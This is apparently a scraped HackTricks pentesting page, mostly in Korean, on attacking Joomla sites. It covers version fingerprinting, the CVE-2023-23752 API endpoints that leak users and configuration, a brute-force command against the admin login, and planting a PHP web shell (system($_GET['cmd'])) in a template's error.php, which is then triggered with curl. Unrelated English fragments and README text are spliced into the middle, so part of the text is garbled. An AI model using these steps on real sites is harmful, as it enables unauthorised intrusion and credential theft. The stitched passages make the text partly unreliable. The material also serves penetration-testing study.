5.7 KiB
Joomla
htARTE (HackTricks AWS Red Team 전문가)로부터 AWS 해킹을 처음부터 전문가까지 배우세요!
- 사이버 보안 회사에서 일하시나요? 회사가 HackTricks에 광고되길 원하시나요? 혹은 PEASS의 최신 버전에 액세스하거나 HackTricks를 PDF로 다운로드하고 싶으신가요? 구독 요금제를 확인해보세요!
- The PEASS Family를 발견해보세요, 저희의 독점 NFT 컬렉션
- 공식 PEASS & HackTricks 스웨그를 얻으세요
- 💬 Discord 그룹에 가입하거나 텔레그램 그룹에 참여하거나 트위터 🐦@carlospolopm을 팔로우하세요.
- **해킹 트릭을 공유하고 싶으시다면 hacktricks repo 및 hacktricks-cloud repo**로 PR을 제출하세요.
Joomla 통계
Joomla는 Joomla 설치에서 사용 중인 Joomla, PHP 및 데이터베이스 버전 및 서버 운영 체제의 분해와 같은 일부 익명의 사용 통계를 수집합니다. 이 데이터는 공개 API를 통해 쿼리할 수 있습니다.
curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool
{
"data": {
"cms_version": {
"3.0": 0,
"3.1": 0,
"3.10": 6.33,
"3.2": 0.01,
"3.3": 0.02,
"3.4": 0.05,
"3.5": 12.24,
"3.6": 22.85,
"3.7": 7.99,
"3.8": 17.72,
"3.9": 27.24,
"4.0": 3.21,
"4.1": 1.53,
"4.2": 0.82,
"4.3": 0,
"5.0": 0
},
"total": 2951032
}
}
열거
발견/풋프린팅
- 메타를 확인하세요.
curl https://www.joomla.org/ | grep Joomla | grep generator
<meta name="generator" content="Joomla! - Open Source Content Management" />
- 로봇.txt
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]
- README.txt
Joomla
Joomla Configuration File
The Joomla configuration file configuration.php
contains sensitive information such as database credentials. It is located in the root directory of the Joomla installation.
Finding Joomla Version
To find the Joomla version, you can look for the version number in the README.txt
file or check the generator
meta tag in the website's source code.
Exploiting Joomla Vulnerabilities
Exploiting known vulnerabilities in Joomla can provide unauthorized access to the website. It is important to keep Joomla and its extensions up to date to prevent exploitation.
Joomla Security Scanner
Using a Joomla security scanner can help identify security issues in a Joomla website. Tools like JoomScan can be used to scan for vulnerabilities and misconfigurations.
Brute Forcing Joomla Login
Brute forcing the Joomla login page can be attempted using tools like Hydra or Burp Suite to crack weak passwords and gain unauthorized access to the Joomla admin panel.
1- What is this?
* This is a Joomla! installation/upgrade package to version 3.x
* Joomla! Official site: https://www.joomla.org
* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging
버전
- /administrator/manifests/files/joomla.xml에서 버전을 확인할 수 있습니다.
- /language/en-GB/en-GB.xml에서 Joomla의 버전을 얻을 수 있습니다.
- plugins/system/cache/cache.xml에서 대략적인 버전을 확인할 수 있습니다.
자동
droopescan scan joomla --url http://joomla-site.local/
API 인증되지 않은 정보 노출:
버전 4.0.0부터 4.2.7까지는 인증되지 않은 정보 노출 취약점 (CVE-2023-23752)에 취약하여 자격 증명 및 기타 정보를 누출할 수 있습니다.
-
사용자:
http://<호스트>/api/v1/users?public=true
-
구성 파일:
http://<호스트>/api/index.php/v1/config/application?public=true
MSF 모듈: scanner/http/joomla_api_improper_access_checks
또는 루비 스크립트: 51334
브루트 포스
로그인을 브루트 포스하기 위해 이 스크립트를 사용할 수 있습니다.
sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
admin:admin
RCE
만약 관리자 자격 증명을 획들했다면 PHP 코드 조각을 추가하여 RCE에 들어갈 수 있습니다. 이를 위해 템플릿을 사용자 정의할 수 있습니다.
구성
아래 **템플릿
**을 클릭하여 템플릿 메뉴를 엽니다.템플릿
열 아래 **protostar
**를 선택하여템플릿: 사용자 정의
페이지로 이동합니다.- 마지막으로 페이지 소스를 확인하기 위해 페이지를 클릭합니다.
error.php
페이지를 선택해봅시다. 다음과 같이 PHP 한 줄로 코드 실행을 얻기 위한 코드를 추가합니다:system($_GET['cmd']);
- 저장 및 닫기
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id